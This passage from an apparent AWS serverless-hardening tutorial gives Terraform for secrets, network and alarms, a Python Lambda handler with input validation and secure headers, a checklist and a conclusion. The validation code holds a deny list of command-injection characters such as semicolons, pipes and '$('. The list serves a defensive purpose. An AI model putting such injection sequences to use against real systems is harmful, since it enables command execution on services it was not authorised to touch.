    cidr_blocks = ["10.0.0.0/16"] # inside the VPC only
  }

  # No ingress rules - Lambda does not accept inbound connections

  lifecycle {
    create_before_destroy = true
  }

  tags = {
    Name = "lambda-secure-sg"
  }
}

# 5. Secret storage - Secrets Manager
resource "aws_secretsmanager_secret" "db_credentials" {
  name                    = "prod/lambda/db-credentials"
  description             = "Database credentials for Lambda function"
  recovery_window_in_days = 30 # guards against accidental deletion

  # Encrypt with a customer-managed KMS key
  kms_key_id = aws_kms_key.secrets.arn
}

resource "aws_secretsmanager_secret_version" "db_credentials" {
  secret_id = aws_secretsmanager_secret.db_credentials.id
  secret_string = jsonencode({
    username = "lambda_reader"
    password = var.db_password # passed in as a variable, never hard-coded
    host     = aws_db_instance.primary.address
    port     = "5432"
    dbname   = "appdb"
  })
}

# 6. Monitoring and alerting
resource "aws_cloudwatch_metric_alarm" "lambda_errors" {
  alarm_name          = "${var.function_name}-error-rate"
  comparison_operator = "GreaterThanThreshold"
  evaluation_periods  = "2"
  metric_name         = "Errors"
  namespace           = "AWS/Lambda"
  period              = "300"
  statistic           = "Sum"
  threshold           = "5"
  alarm_description   = "Lambda function error rate exceeded threshold"

  dimensions = {
    FunctionName = aws_lambda_function.secure_function.function_name
  }

  alarm_actions = [aws_sns_topic.security_alerts.arn]
}

resource "aws_cloudwatch_metric_alarm" "lambda_throttles" {
  alarm_name          = "${var.function_name}-throttles"
  comparison_operator = "GreaterThanThreshold"
  evaluation_periods  = "1"
  metric_name         = "Throttles"
  namespace           = "AWS/Lambda"
  period              = "60"
  statistic           = "Sum"
  threshold           = "0"
  alarm_description   = "Lambda function is being throttled"

  dimensions = {
    FunctionName = aws_lambda_function.secure_function.function_name
  }
}
Secure Lambda Function Code Example
"""
Secure Lambda function - best-practice example.
Covers input validation, secret management, safe logging, and error handling.
"""
import os
import json
import boto3
import logging
import hashlib
from typing import Dict, Any
from botocore.exceptions import ClientError

# Safe logging configuration - never log sensitive information
logger = logging.getLogger()
logger.setLevel(os.environ.get('LOG_LEVEL', 'WARN'))

# Initialize AWS clients outside the handler so warm invocations reuse them
secrets_client = boto3.client('secretsmanager')
s3_client = boto3.client('s3')

# Configuration
MAX_PAYLOAD_SIZE = 1024 * 1024  # maximum request body: 1 MB
ALLOWED_CONTENT_TYPES = {'application/json'}
RATE_LIMIT_WINDOW = 300  # seconds


def get_secret(secret_arn: str) -> Dict[str, str]:
    """Fetch credentials from Secrets Manager without logging them."""
    try:
        response = secrets_client.get_secret_value(SecretId=secret_arn)
        secret = json.loads(response['SecretString'])
        logger.info(f"Secret retrieved: {hashlib.sha256(secret_arn.encode()).hexdigest()[:8]}...")
        return secret
    except ClientError as e:
        error_code = e.response['Error']['Code']
        if error_code == 'ResourceNotFoundException':
            logger.error(f"Secret not found: {secret_arn[:20]}...")
        elif error_code == 'AccessDeniedException':
            logger.error(f"Access denied to secret")
        else:
            logger.error(f"Secret retrieval failed: {error_code}")
        raise


def validate_input(event: Dict[str, Any]) -> Dict[str, Any]:
    """Strict input validation."""
    errors = []

    # Check the request body size (in bytes, not characters)
    body = event.get('body') or ''
    if isinstance(body, str) and len(body.encode('utf-8')) > MAX_PAYLOAD_SIZE:
        errors.append(f"Request body exceeds maximum size of {MAX_PAYLOAD_SIZE} bytes")

    # Validate Content-Type, ignoring parameters such as "; charset=utf-8"
    headers = event.get('headers') or {}
    content_type = headers.get('Content-Type', headers.get('content-type', ''))
    media_type = content_type.split(';')[0].strip().lower()
    if media_type and media_type not in ALLOWED_CONTENT_TYPES:
        errors.append(f"Unsupported Content-Type: {content_type}")

    # Parse the body and stop early unless it is a JSON object, so the
    # checks below never index into a string or None
    if isinstance(body, str):
        try:
            body = json.loads(body)
        except json.JSONDecodeError:
            body = None
    if not isinstance(body, dict):
        errors.append("Request body must be a valid JSON object")
        return {'valid': False, 'errors': errors}

    # Check required parameters
    required_params = ['action', 'data']
    for param in required_params:
        if param not in body:
            errors.append(f"Missing required parameter: {param}")

    # Input sanitization - guard against injection
    if 'data' in body:
        data = body['data']
        if isinstance(data, str):
            # Look for patterns typical of command injection
            dangerous_patterns = [';', '|', '&', '$(', '`', '\\x', '\\0']
            for pattern in dangerous_patterns:
                if pattern in data:
                    errors.append(f"Suspicious pattern detected in input")
                    break

    if errors:
        return {'valid': False, 'errors': errors}
    return {'valid': True, 'data': body}


def create_security_header() -> Dict[str, str]:
    """Build secure HTTP response headers."""
    return {
        'Content-Type': 'application/json',
        'X-Content-Type-Options': 'nosniff',
        'X-Frame-Options': 'DENY',
        'X-XSS-Protection': '1; mode=block',
        'Strict-Transport-Security': 'max-age=31536000; includeSubDomains',
        'Cache-Control': 'no-store, no-cache, must-revalidate',
        'Pragma': 'no-cache',
        # No Server header is emitted
    }


def handler(event: Dict[str, Any], context) -> Dict[str, Any]:
    """Lambda handler - secure implementation."""
    request_id = context.aws_request_id
    try:
        # 1. Input validation
        validation = validate_input(event)
        if not validation['valid']:
            logger.warning(
                f"Input validation failed: {validation['errors']}",
                extra={'request_id': request_id}
            )
            return {
                'statusCode': 400,
                'headers': create_security_header(),
                'body': json.dumps({
                    'error': 'Invalid request',
                    'message': 'Request validation failed'
                })
            }
        # 2. Fetch database credentials (dynamically, never cached)
        db_secret_arn = os.environ.get('DB_SECRET_ARN')
        if not db_secret_arn:
            raise EnvironmentError("Database secret ARN not configured")
        db_credentials = get_secret(db_secret_arn)
        # 3. Business logic
        data = validation['data']
        result = process_request(data, db_credentials, request_id)
        return {
            'statusCode': 200,
            'headers': create_security_header(),
            'body': json.dumps(result)
        }
    except Exception as e:
        # 4. Safe error handling - do not leak internal details
        logger.error(
            f"Unhandled exception: {type(e).__name__}",
            extra={
                'request_id': request_id,
                'error_type': type(e).__name__
            },
            exc_info=True
        )
        return {
            'statusCode': 500,
            'headers': create_security_header(),
            'body': json.dumps({
                'error': 'Internal server error',
                'request_id': request_id  # for tracing; the stack trace is not exposed
            })
        }


def process_request(data: Dict, credentials: Dict, request_id: str) -> Dict:
    """Handle a business request."""
    action = data.get('action')
    # Route actions through an explicit allow-list (never eval or reflection).
    # handle_query, handle_upload, and handle_status are assumed to be
    # defined elsewhere in this module.
    action_handlers = {
        'query': handle_query,
        'upload': handle_upload,
        'status': handle_status,
    }
    handler_func = action_handlers.get(action)
    if not handler_func:
        raise ValueError(f"Unknown action: {action}")
    return handler_func(data, credentials, request_id)
Defense Summary: Serverless Hardening Checklist
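┌────────────────────────────────────────────────────────────────────┐
│ Serverless Security Hardening Checklist                            │
├────────────────────────────────────────────────────────────────────┤
│                                                                    │
│ [ ] IAM permissions                                                │
│     - Apply the principle of least privilege                       │
│     - Disallow iam:* and *:* policies                              │
│     - Audit execution roles regularly (see the audit script above) │
│     - Enable IAM Access Analyzer                                   │
│                                                                    │
│ [ ] Code security                                                  │
│     - Validate and sanitize input                                  │
│     - Keep sensitive data out of logs                              │
│     - Avoid eval/exec                                              │
│     - Scan dependencies for vulnerabilities                        │
│                                                                    │
│ [ ] Runtime security                                               │
│     - Enable VPC isolation                                         │
│     - Restrict outbound traffic with security groups               │
│     - Set a reasonable timeout and memory limit                    │
│     - Enable X-Ray tracing                                         │
│                                                                    │
│ [ ] Data protection                                                │
│     - No plaintext secrets in environment variables                │
│     - Use Secrets Manager or Parameter Store                       │
│     - Enable S3 SSE and KMS encryption                             │
│     - Encrypt sensitive logs with KMS                              │
│                                                                    │
│ [ ] API Gateway                                                    │
│     - Enable WAF rule sets                                         │
│     - Configure rate limiting                                      │
│     - Enable request validation                                    │
│     - Authenticate with JWT or API keys                            │
│                                                                    │
│ [ ] Monitoring and alerting                                        │
│     - Configure CloudWatch alarms                                  │
│     - Monitor for anomalous invocation patterns                    │
│     - Set up dead-letter queues                                    │
│     - Enable detailed access logging                               │
│                                                                    │
└────────────────────────────────────────────────────────────────────┘
Conclusion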
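Serverless architecture changes how applications are deployed, but it does not eliminate security risk. Cold-start hijacking and privilege escalation attacks are a reminder that, while we enjoy elastic scaling and freedom from operations work, responsibility for secure configuration remains with the developer. Applying least privilege, strict input validation, Layer integrity checks, and comprehensive monitoring substantially reduces the attack surface of a serverless environment.
On the road to cloud-native security, the depth of the defenses determines how secure the system really is. Serverless is not a silver bullet, but it is a sound direction for building secure, elastic, and scalable applications, as long as security is respected at every step.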